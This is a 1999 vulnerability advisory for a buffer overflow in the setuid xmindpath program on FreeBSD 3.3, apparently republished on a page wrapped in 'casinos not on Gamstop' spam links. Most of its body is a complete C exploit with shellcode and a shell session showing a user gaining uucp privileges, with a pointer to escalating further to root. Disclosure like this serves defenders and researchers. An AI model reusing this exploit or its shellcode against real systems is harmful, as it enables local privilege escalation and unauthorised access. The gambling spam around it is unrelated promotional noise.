Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino
2nd Dec 1999 [SBWID-236]
COMMAND
	    /usr/X11R6/bin/xmindpath
SYSTEMS AFFECTED
	    FreeBSD 3.3
PROBLEM
	    Brock  Tellier  found  following.    It  was  tested  on   FreeBSD
	    3.3-RELEASE.   The program  was installed  with the  default perms
	    given when unpacked with sysinstall:
	
	        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
	
	    /usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
	    overflow which  will allow  any user  to gain  uucp privs.  Simply
	    enough:
	
	        xmindpath -f $BUF
	
	    See my "faxalter"  advisory for more  info on gaining  root w/euid
	    uucp.  Exploit:
	
	        bash-2.03$ ls -la `which xmindpath`; id
	        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
	        uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
	        bash-2.03$ ./xmindx
	        FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
	        Brock Tellier [email protected]
	        Using addr: 0xbfbfcfa8
	        bash-2.03$ xmindpath -f $RET
	        lock open: File name too long
	        $ id
	        uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
	        $
	
	    The code itself:
	
	    /*
	     *
	     * FreeBSD 3.3 xmindpath exploit gives euid uucp
	     * Compile: gcc -o xmindx xmindx.c
	     * Usage: ./xmindx <offset>  /path/to/mindpath -f $RET
	     * Brock Tellier <[email protected]>
	     *
	     */
	    #include <stdlib.h>
	    #include <stdio.h>
	    char shell[]= /* [email protected] */
	    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
	    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
	    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
	    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
	    #define EGGLEN 2048
	    #define RETLEN 279
	    #define ALIGN 3
	    #define NOP 0x90
	    int main(int argc, char *argv[]) {
	    long int offset=0;
	    int i;
	    int egglen = EGGLEN;
	    int retlen = RETLEN;
	    long int addr = 0xbfbfcfa8;
	    char egg[EGGLEN];
	    char ret[RETLEN];
	    if (argc == 2) offset = atoi(argv[1]);
	    addr=addr + offset;
	    fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
	    fprintf(stderr, "Brock Tellier [email protected]\n");
	    fprintf(stderr, "Using addr: 0x%x\n", addr);
	    memset(egg,NOP,egglen);
	    memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
	    for(i=ALIGN;i< retlen;i+=4)
	    *(int *)&ret[i]=addr;
	    memcpy(egg, "EGG=", 4);
	    putenv(egg);
	    memcpy(ret,"RET=",4);
	    putenv(ret);
	    system("/usr/local/bin/bash");
	    }
	
SOLUTION
	    This one is a hole in the vendor-provided software, which wants to
	    install it setuid  uucp by default.   With ~2800 third-party  apps
	    shipped with FreeBSD, you may expect this to happen.
Internet highlights

Casino Not On Gamstop